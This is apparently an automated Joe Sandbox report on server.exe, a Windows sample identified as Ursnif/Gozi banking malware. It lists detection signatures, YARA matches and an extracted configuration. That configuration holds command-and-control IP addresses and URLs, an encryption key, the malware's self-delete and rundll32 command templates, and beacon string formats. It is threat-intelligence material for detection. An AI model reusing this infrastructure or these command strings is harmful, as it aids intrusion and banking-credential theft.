Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:830549
MD5:2ca14653601a8e9adb830e183c5874d7
SHA1:0e75f94eb23c8aac9b3301951d2df8639304a165
SHA256:a9934cc506821e82237fdaf471f845e1e027b37841d635f971b8df6853e9d7f9
Tags:agenziaentrateexegoziisfbmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • server.exe (PID: 6052 cmdline: C:\Users\user\Desktop\server.exe MD5: 2CA14653601A8E9ADB830E183C5874D7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      Click to see the 27 entries
      No Sigma rule has matched
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeVirustotal: Detection: 42%Perma Link
      Source: server.exeJoe Sandbox ML: detected
      Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02221508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02221508

      Compliance

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
      Source: server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/
      Source: server.exe, 00000000.00000002.517572455.0000000000773000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/
      Source: server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/xJ
      Source: unknownDNS traffic detected: queries for: checklist.skype.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Source: Yara matchFile source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: server.exe, 00000000.00000002.517494434.000000000070A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02221508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02221508

      System Summary

      barindex
      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.517545518.0000000000716000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_022216DF0_2_022216DF
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0222832C0_2_0222832C
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02221D8A0_2_02221D8A
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,0_2_0040110B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,0_2_00401459
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
